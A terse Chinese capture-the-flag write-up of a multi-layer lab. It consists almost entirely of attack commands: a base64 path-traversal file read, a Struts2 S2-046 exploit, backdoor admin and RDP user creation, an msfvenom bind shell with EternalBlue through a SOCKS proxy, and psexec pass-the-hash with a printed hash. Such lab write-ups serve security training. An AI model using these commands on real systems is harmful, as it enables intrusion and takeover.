信息泄露引发的血案
任意文件读取base64编码
..\..\..\..\Users\Administrator\Desktop\flagLi5cLi5cLi5cLi5cVXNlcnNcQWRtaW5pc3RyYXRvclxEZXNrdG9wXGZsYWc
清晨的第一缕阳光
第一层
目录扫描
struts2框架内利用s46
flag{8nmMOYCDTIyN3EbHSjoeK0FgduXVwGr1}
第二层
添加用户进行远程登录
net user which admin@123 /add
net localgroup "Remote Desktop Users" which /add
net localgroup administrators which /add
192.168.99.120靶机进行fscan发现存在永恒之蓝
# 生成马
msfvenom -p windows/x64/shell_bind_tcp LPORT=4444 -f raw -o shellcode.bin
setg Proxies socks5:156.238.233.63:4445
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.99.112
set PAYLOAD windows/x64/shell_bind_tcp
set LPORT 4444
exploit
proxychains4 nc 192.168.99.112 4444
第三层
添加用户
net user which admin@123 /add
net localgroup "Remote Desktop Users" which /add
net localgroup administrators which /add
Administrator 173964ad89f81721613e41bd1122e65fproxychains python3 /usr/share/doc/python3-impacket/examples/psexec.py WORKGROUP/Administrator@10.223.155.223 -hashes :173964ad89f81721613e41bd1122e65f 
Comments NOTHING